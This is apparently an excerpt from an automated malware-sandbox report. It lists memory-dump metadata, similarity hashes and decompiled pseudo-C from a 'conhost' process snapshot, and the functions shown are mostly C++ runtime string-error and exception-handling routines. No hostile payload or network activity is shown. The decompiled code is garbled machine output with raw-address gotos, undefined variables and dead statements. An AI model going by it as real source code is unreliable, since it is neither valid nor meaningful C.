                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
                        • API String ID: 0-3532027576
                        • Opcode ID: d063a21194f5820915c53b49d25065e468c9214c46aec8abfa25f0a4d6335fbf
                        • Instruction ID: 109f7ce92bbd5974dc2bbf4784af215e4064b4f51e8fdd11cda5bbe8b115b2ff
                        • Opcode Fuzzy Hash: d063a21194f5820915c53b49d25065e468c9214c46aec8abfa25f0a4d6335fbf
                        • Instruction Fuzzy Hash: F1F0E252F0474691EE20DFAAE4915B97324F769BC4B902472C90D63320EE3CE151D344
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935E18B0(signed int __eax, void* __ecx, signed int __edx, void* __r8, void* __r9, signed int _a16, intOrPtr _a40) {
                        				long long _v152;
                        				intOrPtr _v156;
                        				signed char _v200;
                        				long long _v208;
                        				long long _v216;
                        				long long _v224;
                        				void* _t24;
                        				void* _t33;
                        				long long _t49;
                        
                        				_a16 = __edx;
                        				_v152 = 0;
                        				_v156 = 0;
                        				if (__ecx != 1) goto 0x935e1988;
                        				_v216 = 0xbcd4d500 + __r8;
                        				_v224 = 0xbcd4d500 - 1 < 0;
                        				_t33 = __edx - 6;
                        				_v200 = (__eax & 0xffffff00 | _t33 == 0x00000000) & dil;
                        				if (_t33 == 0) goto 0x935e19a8;
                        				_t49 =  *((intOrPtr*)(__r9 - 0x10));
                        				if (_t49 == 0) goto 0x935e1b4e;
                        				_v208 =  *((intOrPtr*)(__r9 - 0x18));
                        				if ( *((intOrPtr*)(__r9 - 0x24)) < 0) goto 0x935e1bd3;
                        				_v224 = _t49;
                        				E00007FF67FF6935CEF80(E00007FF67FF6935CEF30(E00007FF67FF6935CEF30((__eax & 0xffffff00 | _t33 == 0x00000000) & dil, __edx ^ __edx, _a40, __r9), 1, _a40,  *((intOrPtr*)(__r9 - 0x24))), _t24, _a40, _v224);
                        				goto 0x935e198d;
                        				return 3;
                        			}












                        0x7ff6935e18cb
                        0x7ff6935e18d5
                        0x7ff6935e18de
                        0x7ff6935e18e9
                        0x7ff6935e1900
                        0x7ff6935e1905
                        0x7ff6935e190a
                        0x7ff6935e1918
                        0x7ff6935e191c
                        0x7ff6935e1922
                        0x7ff6935e1929
                        0x7ff6935e1937
                        0x7ff6935e193e
                        0x7ff6935e1950
                        0x7ff6935e1975
                        0x7ff6935e197f
                        0x7ff6935e19a0

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7539445407be5b8fb7c9c51e2a3a62ac00e8785209f4a8e1cea80bea5e2149f5
                        • Instruction ID: fefeb5661aacfdb4c688aa5ac68977fbee9f70b272aafdbc53e64a61d3c73530
                        • Opcode Fuzzy Hash: 7539445407be5b8fb7c9c51e2a3a62ac00e8785209f4a8e1cea80bea5e2149f5
                        • Instruction Fuzzy Hash: 3BF1C322A0DB9151EB749B11E4023BEABA9FB897C4F4440B5EE8DD7B85DF3CD6448B40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Time$FileSystem
                        • String ID:
                        • API String ID: 2086374402-0
                        • Opcode ID: 548d6c5561f1d63b6eeacdc276154b9acb0c4f1ca1d437845f35bf51bfa6a507
                        • Instruction ID: b2ce4256bb0be50901907420a34aa165a24219a307d6e95d1753fc55e591a180
                        • Opcode Fuzzy Hash: 548d6c5561f1d63b6eeacdc276154b9acb0c4f1ca1d437845f35bf51bfa6a507
                        • Instruction Fuzzy Hash: 4CD012A6B1864987DE20CB42F5421556762D7DC7E5B404120EE5D93738DE3CEA568F00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 73%
                        			E00007FF67FF6935F17C0() {
                        				long long _v296;
                        				void* _t51;
                        				void* _t53;
                        				void* _t54;
                        				int _t56;
                        				long long* _t65;
                        				void* _t66;
                        				void* _t67;
                        				int _t75;
                        				void* _t120;
                        				int _t121;
                        				int _t122;
                        				int _t123;
                        				int _t124;
                        				int _t125;
                        				int _t130;
                        
                        				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t67);
                        				_t121 = _t56;
                        				E00007FF67FF6935E9440(_t56, _t67);
                        				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t121, 0x935f8b90, 0x7ff6935e9560, _t120, _t121, _t67);
                        				_t128 = _t56;
                        				E00007FF67FF6935F1020(_t121);
                        				E00007FF67FF6935CF280();
                        				_push(_t56);
                        				_push(_t121);
                        				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t128);
                        				_t122 = _t56;
                        				E00007FF67FF6935E95C0(_t56, _t128);
                        				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t122, 0x935f8bb0, 0x7ff6935e96e0, _t120, _t122, _t128);
                        				_t130 = _t56;
                        				E00007FF67FF6935F1020(_t122);
                        				_t75 = _t130;
                        				E00007FF67FF6935CF280();
                        				_push(_t130);
                        				_push(_t122);
                        				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t75);
                        				_t123 = _t56;
                        				E00007FF67FF6935E9AD0(_t56, _t75);
                        				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t123, 0x935f8bf0, 0x7ff6935e9c00, _t120, _t123, _t75);
                        				_t132 = _t56;
                        				E00007FF67FF6935F1020(_t123);
                        				E00007FF67FF6935CF280();
                        				_push(_t56);
                        				_push(_t123);
                        				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t132);
                        				_t124 = _t56;
                        				E00007FF67FF6935E8B80(_t56, _t132);
                        				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t124, 0x935f8b50, 0x7ff6935e8ca0, _t120, _t124, _t132);
                        				_t134 = _t56;
                        				E00007FF67FF6935F1020(_t124);
                        				E00007FF67FF6935CF280();
                        				_push(_t56);
                        				_push(_t124);
                        				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t134);
                        				_t125 = _t56;
                        				E00007FF67FF6935E9CA0(_t56, _t134);
                        				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t125, 0x935f8c10, 0x7ff6935e9dc0, _t120, _t125, _t134);
                        				_t136 = _t56;
                        				E00007FF67FF6935F1020(_t125);
                        				E00007FF67FF6935CF280();
                        				_push(_t56);
                        				E00007FF67FF6935F0CD0(_t53, _t54, _t56, _t136);
                        				_t126 = _t56;
                        				E00007FF67FF6935E9E20(_t56, _t136);
                        				E00007FF67FF6935F1490(0x10, _t51, _t56, _t66, _t56, 0x935f8c30, 0x7ff6935e9f40, _t120, _t56, _t136);
                        				E00007FF67FF6935F1020(_t126);
                        				E00007FF67FF6935CF280();
                        				_v296 = 0;
                        				asm("ud2");
                        				_v296 = 0;
                        				asm("ud2");
                        				_v296 = 0;
                        				asm("ud2");
                        				_v296 = 0;
                        				asm("ud2");
                        				 *0 = 0;
                        				asm("ud2");
                        				_v296 = 0;
                        				asm("ud2");
                        				_v296 = 0;
                        				asm("ud2");
                        				_v296 = 0;
                        				asm("ud2");
                        				_v296 = 0;
                        				asm("ud2");
                        				_v296 = 0;
                        				_t65 =  *0x10;
                        				asm("ud2");
                        				0;
                        				E00007FF67FF6935CFD40(0x935f4100, 0x935f8c30);
                        				 *0x935f4118 = 0x12400;
                        				malloc(_t125);
                        				 *0x935f4110 = _t65;
                        				if (_t65 == 0) goto 0x935f1ab9;
                        				 *0x935f4108 = _t65;
                        				 *_t65 = 0x12400;
                        				 *((long long*)(_t65 + 8)) = 0;
                        				goto E00007FF67FF6935C1520;
                        				 *0x935f4118 = 0;
                        				 *0x935f4108 = 0;
                        				goto 0x935f1aa9;
                        				0;
                        				0;
                        				0;
                        			}



















                        0x7ff6935f17d0
                        0x7ff6935f17db
                        0x7ff6935f17de
                        0x7ff6935f17f4
                        0x7ff6935f17f9
                        0x7ff6935f17ff
                        0x7ff6935f1807
                        0x7ff6935f1810
                        0x7ff6935f1812
                        0x7ff6935f1820
                        0x7ff6935f182b
                        0x7ff6935f182e
                        0x7ff6935f1844
                        0x7ff6935f1849
                        0x7ff6935f184f
                        0x7ff6935f1854
                        0x7ff6935f1857
                        0x7ff6935f1860
                        0x7ff6935f1862
                        0x7ff6935f1870
                        0x7ff6935f187b
                        0x7ff6935f187e
                        0x7ff6935f1894
                        0x7ff6935f1899
                        0x7ff6935f189f
                        0x7ff6935f18a7
                        0x7ff6935f18b0
                        0x7ff6935f18b2
                        0x7ff6935f18c0
                        0x7ff6935f18cb
                        0x7ff6935f18ce
                        0x7ff6935f18e4
                        0x7ff6935f18e9
                        0x7ff6935f18ef
                        0x7ff6935f18f7
                        0x7ff6935f1900
                        0x7ff6935f1902
                        0x7ff6935f1910
                        0x7ff6935f191b
                        0x7ff6935f191e
                        0x7ff6935f1934
                        0x7ff6935f1939
                        0x7ff6935f193f
                        0x7ff6935f1947
                        0x7ff6935f1950
                        0x7ff6935f1960
                        0x7ff6935f196b
                        0x7ff6935f196e
                        0x7ff6935f1984
                        0x7ff6935f198f
                        0x7ff6935f1997
                        0x7ff6935f19a0
                        0x7ff6935f19b1
                        0x7ff6935f19b3
                        0x7ff6935f19c4
                        0x7ff6935f19c6
                        0x7ff6935f19d7
                        0x7ff6935f19d9
                        0x7ff6935f19ea
                        0x7ff6935f19ec
                        0x7ff6935f19f7
                        0x7ff6935f19f9
                        0x7ff6935f1a0a
                        0x7ff6935f1a0c
                        0x7ff6935f1a1d
                        0x7ff6935f1a1f
                        0x7ff6935f1a30
                        0x7ff6935f1a32
                        0x7ff6935f1a43
                        0x7ff6935f1a45
                        0x7ff6935f1a4e
                        0x7ff6935f1a56
                        0x7ff6935f1a5e
                        0x7ff6935f1a6d
                        0x7ff6935f1a77
                        0x7ff6935f1a82
                        0x7ff6935f1a87
                        0x7ff6935f1a91
                        0x7ff6935f1a93
                        0x7ff6935f1a9a
                        0x7ff6935f1aa1
                        0x7ff6935f1ab4
                        0x7ff6935f1ab9
                        0x7ff6935f1ac4
                        0x7ff6935f1acf
                        0x7ff6935f1ad7
                        0x7ff6935f1adb
                        0x7ff6935f1adf

                        APIs
                          • Part of subcall function 00007FF6935F0CD0: malloc.MSVCRT(?,?,?,?,00007FF6935F16E5,?,?,?,?,00007FF6935C34A4), ref: 00007FF6935F0CE1
                          • Part of subcall function 00007FF6935CF280: RtlCaptureContext.KERNEL32 ref: 00007FF6935CF305
                          • Part of subcall function 00007FF6935CF280: RtlUnwindEx.KERNEL32 ref: 00007FF6935CF323
                          • Part of subcall function 00007FF6935CF280: abort.MSVCRT ref: 00007FF6935CF329
                        • malloc.MSVCRT ref: 00007FF6935F1A82
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen$malloc$CaptureContextUnwindabort
                        • String ID:
                        • API String ID: 3412053993-0
                        • Opcode ID: 5628fa9cbb6d1ce4e6981e770d8ad87bcc2999704c8897ee67a5aff30ae11004
                        • Instruction ID: 96e071229bacb29d98e8d5eb32123c912fcabcaa0943436a3b23b33fed34f01c
                        • Opcode Fuzzy Hash: 5628fa9cbb6d1ce4e6981e770d8ad87bcc2999704c8897ee67a5aff30ae11004
                        • Instruction Fuzzy Hash: 3361A361A0A64651EA34AB17BC173BA6369FF4E7C8F4014B0EC4DAB396CE7CE144D344
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E00007FF67FF6935F1610() {
                        				long long _v584;
                        				void* _t81;
                        				void* _t83;
                        				void* _t84;
                        				int*** _t87;
                        				intOrPtr _t88;
                        				int** _t89;
                        				intOrPtr _t90;
                        				int* _t91;
                        				intOrPtr _t92;
                        				int _t93;
                        				long long* _t102;
                        				void* _t103;
                        				void* _t104;
                        				int _t119;
                        				int _t127;
                        				void* _t193;
                        				void* _t194;
                        				int _t195;
                        				int _t196;
                        				int _t197;
                        				int _t198;
                        				int _t199;
                        				int _t200;
                        				int _t201;
                        				int _t202;
                        				void* _t204;
                        				int _t210;
                        				int _t214;
                        
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t87, _t104);
                        				_t88 =  *0x935f8810; // 0x7ff6935f9370
                        				_t89 = _t88 + 0x10;
                        				 *_t87 = _t89;
                        				E00007FF67FF6935F1490(8, _t81, _t89, _t103, _t87, 0x935f8c90, 0x7ff6935f02e0, _t193, _t194, _t204);
                        				0;
                        				0;
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t89, _t87);
                        				_t90 =  *0x935f8800; // 0x7ff6935f9340
                        				_t91 = _t90 + 0x10;
                        				 *_t89 = _t91;
                        				E00007FF67FF6935F1490(8, _t81, _t91, _t103, _t89, 0x935f8c70, 0x7ff6935f02a0, _t193, _t194, _t204);
                        				0;
                        				0;
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t91, _t89);
                        				_t107 = _t91;
                        				_t92 =  *0x935f8750; // 0x7ff6935f9130
                        				_t93 = _t92 + 0x10;
                        				 *_t91 = _t93;
                        				E00007FF67FF6935F1490(8, _t81, _t93, _t103, _t91, 0x935f8b10, 0x7ff6935e89a0, _t193, _t194, _t204);
                        				0;
                        				0;
                        				_push(_t204);
                        				_push(_t194);
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t107);
                        				_t195 = _t93;
                        				E00007FF67FF6935E89B0(_t93, _t107);
                        				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t195, 0x935f8b30, 0x7ff6935e8ae0, _t193, _t195, _t107);
                        				_t206 = _t93;
                        				E00007FF67FF6935F1020(_t195);
                        				E00007FF67FF6935CF280();
                        				_push(_t93);
                        				_push(_t195);
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
                        				_t196 = _t93;
                        				E00007FF67FF6935E92C0(_t93, _t93);
                        				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t196, 0x935f8b70, 0x7ff6935e93e0, _t193, _t196, _t206);
                        				_t208 = _t93;
                        				E00007FF67FF6935F1020(_t196);
                        				E00007FF67FF6935CF280();
                        				_push(_t93);
                        				_push(_t196);
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
                        				_t197 = _t93;
                        				E00007FF67FF6935E9FA0(_t93, _t93);
                        				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t197, 0x935f8c50, 0x7ff6935ea0c0, _t193, _t197, _t208);
                        				_t210 = _t93;
                        				E00007FF67FF6935F1020(_t197);
                        				_t119 = _t210;
                        				E00007FF67FF6935CF280();
                        				_push(_t210);
                        				_push(_t197);
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t119);
                        				_t198 = _t93;
                        				E00007FF67FF6935E9440(_t93, _t119);
                        				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t198, 0x935f8b90, 0x7ff6935e9560, _t193, _t198, _t119);
                        				_t212 = _t93;
                        				E00007FF67FF6935F1020(_t198);
                        				E00007FF67FF6935CF280();
                        				_push(_t93);
                        				_push(_t198);
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
                        				_t199 = _t93;
                        				E00007FF67FF6935E95C0(_t93, _t93);
                        				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t199, 0x935f8bb0, 0x7ff6935e96e0, _t193, _t199, _t212);
                        				_t214 = _t93;
                        				E00007FF67FF6935F1020(_t199);
                        				_t127 = _t214;
                        				E00007FF67FF6935CF280();
                        				_push(_t214);
                        				_push(_t199);
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t127);
                        				_t200 = _t93;
                        				E00007FF67FF6935E9AD0(_t93, _t127);
                        				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t200, 0x935f8bf0, 0x7ff6935e9c00, _t193, _t200, _t127);
                        				_t216 = _t93;
                        				E00007FF67FF6935F1020(_t200);
                        				E00007FF67FF6935CF280();
                        				_push(_t93);
                        				_push(_t200);
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
                        				_t201 = _t93;
                        				E00007FF67FF6935E8B80(_t93, _t93);
                        				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t201, 0x935f8b50, 0x7ff6935e8ca0, _t193, _t201, _t216);
                        				_t218 = _t93;
                        				E00007FF67FF6935F1020(_t201);
                        				E00007FF67FF6935CF280();
                        				_push(_t93);
                        				_push(_t201);
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
                        				_t202 = _t93;
                        				E00007FF67FF6935E9CA0(_t93, _t93);
                        				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t202, 0x935f8c10, 0x7ff6935e9dc0, _t193, _t202, _t218);
                        				_t220 = _t93;
                        				E00007FF67FF6935F1020(_t202);
                        				E00007FF67FF6935CF280();
                        				_push(_t93);
                        				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
                        				E00007FF67FF6935E9E20(_t93, _t93);
                        				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t93, 0x935f8c30, 0x7ff6935e9f40, _t193, _t93, _t220);
                        				E00007FF67FF6935F1020(_t93);
                        				E00007FF67FF6935CF280();
                        				_v584 = 0;
                        				asm("ud2");
                        				_v584 = 0;
                        				asm("ud2");
                        				_v584 = 0;
                        				asm("ud2");
                        				_v584 = 0;
                        				asm("ud2");
                        				 *0 = 0;
                        				asm("ud2");
                        				_v584 = 0;
                        				asm("ud2");
                        				_v584 = 0;
                        				asm("ud2");
                        				_v584 = 0;
                        				asm("ud2");
                        				_v584 = 0;
                        				asm("ud2");
                        				_v584 = 0;
                        				_t102 =  *0x10;
                        				asm("ud2");
                        				0;
                        				E00007FF67FF6935CFD40(0x935f4100, 0x935f8c30);
                        				 *0x935f4118 = 0x12400;
                        				malloc(_t202);
                        				 *0x935f4110 = _t102;
                        				if (_t102 == 0) goto 0x935f1ab9;
                        				 *0x935f4108 = _t102;
                        				 *_t102 = 0x12400;
                        				 *((long long*)(_t102 + 8)) = 0;
                        				goto E00007FF67FF6935C1520;
                        				 *0x935f4118 = 0;
                        				 *0x935f4108 = 0;
                        				goto 0x935f1aa9;
                        				0;
                        				0;
                        				0;
                        			}
                        0x7ff6935f1619
                        0x7ff6935f162f
                        0x7ff6935f1636
                        0x7ff6935f163a
                        0x7ff6935f163d
                        0x7ff6935f1648
                        0x7ff6935f164c
                        0x7ff6935f1659
                        0x7ff6935f166f
                        0x7ff6935f1676
                        0x7ff6935f167a
                        0x7ff6935f167d
                        0x7ff6935f1688
                        0x7ff6935f168c
                        0x7ff6935f1699
                        0x7ff6935f16ac
                        0x7ff6935f16af
                        0x7ff6935f16b6
                        0x7ff6935f16ba
                        0x7ff6935f16bd
                        0x7ff6935f16c8
                        0x7ff6935f16cc
                        0x7ff6935f16d0
                        0x7ff6935f16d2
                        0x7ff6935f16e0
                        0x7ff6935f16eb
                        0x7ff6935f16ee
                        0x7ff6935f1704
                        0x7ff6935f1709
                        0x7ff6935f170f
                        0x7ff6935f1717
                        0x7ff6935f1720
                        0x7ff6935f1722
                        0x7ff6935f1730
                        0x7ff6935f173b
                        0x7ff6935f173e
                        0x7ff6935f1754
                        0x7ff6935f1759
                        0x7ff6935f175f
                        0x7ff6935f1767
                        0x7ff6935f1770
                        0x7ff6935f1772
                        0x7ff6935f1780
                        0x7ff6935f178b
                        0x7ff6935f178e
                        0x7ff6935f17a4
                        0x7ff6935f17a9
                        0x7ff6935f17af
                        0x7ff6935f17b4
                        0x7ff6935f17b7
                        0x7ff6935f17c0
                        0x7ff6935f17c2
                        0x7ff6935f17d0
                        0x7ff6935f17db
                        0x7ff6935f17de
                        0x7ff6935f17f4
                        0x7ff6935f17f9
                        0x7ff6935f17ff
                        0x7ff6935f1807
                        0x7ff6935f1810
                        0x7ff6935f1812
                        0x7ff6935f1820
                        0x7ff6935f182b
                        0x7ff6935f182e
                        0x7ff6935f1844
                        0x7ff6935f1849
                        0x7ff6935f184f
                        0x7ff6935f1854
                        0x7ff6935f1857
                        0x7ff6935f1860
                        0x7ff6935f1862
                        0x7ff6935f1870
                        0x7ff6935f187b
                        0x7ff6935f187e
                        0x7ff6935f1894
                        0x7ff6935f1899
                        0x7ff6935f189f
                        0x7ff6935f18a7
                        0x7ff6935f18b0
                        0x7ff6935f18b2
                        0x7ff6935f18c0
                        0x7ff6935f18cb
                        0x7ff6935f18ce
                        0x7ff6935f18e4
                        0x7ff6935f18e9
                        0x7ff6935f18ef
                        0x7ff6935f18f7
                        0x7ff6935f1900
                        0x7ff6935f1902
                        0x7ff6935f1910
                        0x7ff6935f191b
                        0x7ff6935f191e
                        0x7ff6935f1934
                        0x7ff6935f1939
                        0x7ff6935f193f
                        0x7ff6935f1947
                        0x7ff6935f1950
                        0x7ff6935f1960
                        0x7ff6935f196e
                        0x7ff6935f1984
                        0x7ff6935f198f
                        0x7ff6935f1997
                        0x7ff6935f19a0
                        0x7ff6935f19b1
                        0x7ff6935f19b3
                        0x7ff6935f19c4
                        0x7ff6935f19c6
                        0x7ff6935f19d7
                        0x7ff6935f19d9
                        0x7ff6935f19ea
                        0x7ff6935f19ec
                        0x7ff6935f19f7
                        0x7ff6935f19f9
                        0x7ff6935f1a0a
                        0x7ff6935f1a0c
                        0x7ff6935f1a1d
                        0x7ff6935f1a1f
                        0x7ff6935f1a30
                        0x7ff6935f1a32
                        0x7ff6935f1a43
                        0x7ff6935f1a45
                        0x7ff6935f1a4e
                        0x7ff6935f1a56
                        0x7ff6935f1a5e
                        0x7ff6935f1a6d
                        0x7ff6935f1a77
                        0x7ff6935f1a82
                        0x7ff6935f1a87
                        0x7ff6935f1a91
                        0x7ff6935f1a93
                        0x7ff6935f1a9a
                        0x7ff6935f1aa1
                        0x7ff6935f1ab4
                        0x7ff6935f1ab9
                        0x7ff6935f1ac4
                        0x7ff6935f1acf
                        0x7ff6935f1ad7
                        0x7ff6935f1adb
                        0x7ff6935f1adf

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen$CaptureContextUnwindabortmalloc
                        • String ID: basic_string::_M_create
                        • API String ID: 214865124-3122258987
                        • Opcode ID: 99402011d8997abeab1787329dd03b1d0581f849c5dd810c8eecc527840ca1a2
                        • Instruction ID: e3a309629d16191e03e85d8a6e0955134da54b9d9aaf44d24a38eff6a4e18daf
                        • Opcode Fuzzy Hash: 99402011d8997abeab1787329dd03b1d0581f849c5dd810c8eecc527840ca1a2
                        • Instruction Fuzzy Hash: D7413D54E0A64351ED28BB667C173BA5259FF4EBC8F8028B1EC0DFB386DD2CA105A344
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E00007FF67FF6935F1860() {
                        				long long _v184;
                        				void* _t39;
                        				void* _t41;
                        				void* _t42;
                        				int _t44;
                        				long long* _t53;
                        				void* _t54;
                        				void* _t55;
                        				void* _t92;
                        				int _t93;
                        				int _t94;
                        				int _t95;
                        
                        				E00007FF67FF6935F0CD0(_t41, _t42, _t44, _t55);
                        				_t93 = _t44;
                        				E00007FF67FF6935E9AD0(_t44, _t55);
                        				E00007FF67FF6935F1490(0x10, _t39, _t44, _t54, _t93, 0x935f8bf0, 0x7ff6935e9c00, _t92, _t93, _t55);
                        				_t98 = _t44;
                        				E00007FF67FF6935F1020(_t93);
                        				E00007FF67FF6935CF280();
                        				_push(_t44);
                        				_push(_t93);
                        				E00007FF67FF6935F0CD0(_t41, _t42, _t44, _t98);
                        				_t94 = _t44;
                        				E00007FF67FF6935E8B80(_t44, _t98);
                        				E00007FF67FF6935F1490(0x10, _t39, _t44, _t54, _t94, 0x935f8b50, 0x7ff6935e8ca0, _t92, _t94, _t98);
                        				_t100 = _t44;
                        				E00007FF67FF6935F1020(_t94);
                        				E00007FF67FF6935CF280();
                        				_push(_t44);
                        				_push(_t94);
                        				E00007FF67FF6935F0CD0(_t41, _t42, _t44, _t100);
                        				_t95 = _t44;
                        				E00007FF67FF6935E9CA0(_t44, _t100);
                        				E00007FF67FF6935F1490(0x10, _t39, _t44, _t54, _t95, 0x935f8c10, 0x7ff6935e9dc0, _t92, _t95, _t100);
                        				_t102 = _t44;
                        				E00007FF67FF6935F1020(_t95);
                        				E00007FF67FF6935CF280();
                        				_push(_t44);
                        				E00007FF67FF6935F0CD0(_t41, _t42, _t44, _t102);
                        				_t96 = _t44;
                        				E00007FF67FF6935E9E20(_t44, _t102);
                        				E00007FF67FF6935F1490(0x10, _t39, _t44, _t54, _t44, 0x935f8c30, 0x7ff6935e9f40, _t92, _t44, _t102);
                        				E00007FF67FF6935F1020(_t96);
                        				E00007FF67FF6935CF280();
                        				_v184 = 0;
                        				asm("ud2");
                        				_v184 = 0;
                        				asm("ud2");
                        				_v184 = 0;
                        				asm("ud2");
                        				_v184 = 0;
                        				asm("ud2");
                        				 *0 = 0;
                        				asm("ud2");
                        				_v184 = 0;
                        				asm("ud2");
                        				_v184 = 0;
                        				asm("ud2");
                        				_v184 = 0;
                        				asm("ud2");
                        				_v184 = 0;
                        				asm("ud2");
                        				_v184 = 0;
                        				_t53 =  *0x10;
                        				asm("ud2");
                        				0;
                        				E00007FF67FF6935CFD40(0x935f4100, 0x935f8c30);
                        				 *0x935f4118 = 0x12400;
                        				malloc(_t95);
                        				 *0x935f4110 = _t53;
                        				if (_t53 == 0) goto 0x935f1ab9;
                        				 *0x935f4108 = _t53;
                        				 *_t53 = 0x12400;
                        				 *((long long*)(_t53 + 8)) = 0;
                        				goto E00007FF67FF6935C1520;
